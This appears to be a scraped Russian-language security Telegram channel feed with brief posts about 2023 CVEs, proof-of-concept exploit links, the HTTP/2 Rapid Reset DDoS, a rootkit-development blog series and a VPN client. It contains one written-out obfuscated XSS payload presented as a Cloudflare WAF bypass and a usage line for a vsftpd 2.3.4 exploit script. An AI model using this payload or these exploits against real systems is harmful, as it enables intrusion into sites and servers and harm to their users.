Криво пропатчили cve-2023-33297
Получился bitcoin botnet ddos attack
Видео + описание

#btc

CVE-2023-41993
POC
#Safari #iOS #iPadOS #macOS

vsftpd (для версии 2.3.4)
usage:
python3 vsftpd_exploit.py <IP address> <port> <command>

Палестино-израильский конфликт
Действующие лица через призму мира хакеров и инфосека
Списки

#again2012

Ну только если в майку встроены наручники и трансфер до США ))))

Windows Exploit Protection Settings (powerSHELL))
link
Так, стоп, погодите...)))

CVE-2023-44487
уязвимость в протоколе HTTP/2
Пока exploit (заточенный на DOS) ползал в дикой природе под атаку попали Google, AWS, CloudFlare \ etc
Пик атаки составлял 389 000 000 (да да) запросов в секунду.
Ну и конечно же все это уплыло ))))
Кстати интересный отчет есть у HAproxy, типа наша хата с краю и вообще наш балансировщик не ДоСится этой уязвимостью.

link 1
link 2
link 3
link 4
link 5
what the fuck notes

#DoS #HA

CVE-2023-2163
Linux Kernel: eBPF verifier bug
POC

Спасибо Julien Mousqueton за отличную подборку, сам то понял какой инструмент создал ? )))
https://ransomware.live/#/status

or winamp 😜
#humor

Windows rootkit development for red teaming
*
Part 1 | Introduction
Part 2 | A tale of routines, IOCTLs and IRPs
Part 3 | Sailing to the land of the user (and debugging the ship)
Part 4 | The call back home
Part 5 | Saruman's Manipulation


*
#malware #windows #rootkit

Cloudflare bypass WAF
*
Payload:
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;

#cloudflare #bypass #waf #xss

CVE-2023-34051
VMware Aria Operations for Logs
*
Technical Deep
*
Exploit


#vmware #bypass #exploit

Каждый раз смешно )))
И мало того, оно даже документировано - Windows Internals part 2

#remoteRegistry #135

So cool ! ))))
link

#Назад_в_будущее

CVE-2023-36745
MS Exchange Server Privilege Escalation
exploit

#exchange

v2rayNG
Xray core and v2fly core
client for Android

#greypath